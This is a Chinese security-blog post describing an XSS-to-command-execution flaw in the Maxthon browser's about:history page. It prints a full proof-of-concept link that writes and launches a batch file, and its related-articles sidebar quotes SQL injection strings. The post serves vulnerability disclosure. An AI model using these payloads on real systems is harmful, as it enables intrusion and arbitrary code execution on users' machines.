傲游浏览器命令执行漏洞介绍以及修复方案

所属分类: 网络安全 / 漏洞分析 阅读数: 121
收藏 0 赞 0 分享




这个漏洞首先是国外某个团队发现的,他研究了多个浏览器的漏洞。其中遨游的漏洞比较独特,大致存在几个方面的,
1.about:history中存在xss漏洞,即浏览历史中url链接中存在明显的xss漏洞。
2.遨游的拓展中存在大量敏感函数,其中包括了写文件(目前看只能写在C:\Documents and Settings\Administrator\Local Settings\Temp目录下),命令执行(执行你写入的文件),此外目测还有大量系统内部数据可以操作,比如下载,配置等等。
3.除了1所说的地方外,Rss订阅那里也有xss漏洞,我个人估计遨游自己的插件大部分地方可能都会存在xss漏洞
4.2中所提到的大量敏感函数都是在dom中,只能在域i.maxthon.com以及本地类似浏览历史,收藏夹这种地方被调用。
 
构造类似链接
http://www.jb51.net /1.html#\"><img src=a onerror='var b=maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k calc.exe");alert(b.name_);maxthon.program.Program.launch(b.name_,"C:\\WINDOWS\\system32")'/>
 
在遨游中访问,
然后打开about:history,就可以看到效果了
那个pdf给的例子是构造了1.html的内容为
a=window.location.href='about:history';
 
修复方案:

ms遨游已经修复了直接打开about:history这个洞 
更多精彩内容其他人还在看

PHP注射一路小跑

  php注射库   ' or 1=1   ' or '1=1   '/*   '%23   ' and password='mypass   id=-1 union select 1,1,1   id=-1 union select char(97),char(97),char
收藏 0 赞 0 分享

网络安全漏洞分析小结

分析漏洞成因,关键步骤之一就是要定位到漏洞代码
收藏 0 赞 0 分享

Discuz论坛短消息未限制发送次数漏洞

  涉及版本:   目前(2003/9/21)所有免费版本(我没有商业版)   描述:   由于pm.php发送消息那部分代码,缺乏对时间间隔的限制。导致任何用户可以对任何用户发送消息炸弹。导致服务器空间、资源被消耗。严重可导致拒绝服务。   具体:   大家可以看到pm.php
收藏 0 赞 0 分享

PHPWIND1.3.6论坛漏洞分析

  PHPWIND 论坛是一款流行的PHP 论坛,界面美观,功能也比较强大。但大家仔细看一下会发现不论是从界面功能还是代码风格,它和 DISCUZ 都非常相似,具体原因我想也就不用说了,毕竟 DISCUZ 出来比它要早很多。
收藏 0 赞 0 分享

IIS 7.0 网站漏洞利用及修复方法

IIS 7.0 网站漏洞利用及修复方法,使用iis 7.0的朋友可以参考下
收藏 0 赞 0 分享

电脑开机速度慢怎么办 教你如何解决

电脑用久了,装的软件,插件,越来越多,所做的操作也会留下很多垃圾文件保持在电脑上,加上电脑硬件也会老化,电脑中毒什么的。都有可能导致电脑开机速度慢。
收藏 0 赞 0 分享

中国移动mas2.0平台系统漏洞暴光 附修复方法

MAS是中国移动的短信代理网关(平台)。MAS是Mobile Agent Server的简称。目前多个政府部门、国有大型企业部门、运营商、金融部门都采用该平台。MAS2.0是中国新一代的代理网关系统。漏洞有可能会泄露使用该平台的单位手机通信录,利用mas发送欺骗短信。
收藏 0 赞 0 分享

人人网CSRF漏洞曝光及修复方案

CSRF(Cross-site request forgery跨站请求伪造,也被称成为“one click attack”或者session riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几
收藏 0 赞 0 分享

讯时后台管理系统v4.9的鸡肋漏洞分析

讯时后台管理系统v4.9版最近发现一个鸡肋漏洞,现在给朋友们分析一下
收藏 0 赞 0 分享

PHP 5.4 (5.4.3) Code Execution (Win32) 代码

PHP 5.4 (5.4.3) Code Execution (Win32)代码
收藏 0 赞 0 分享
查看更多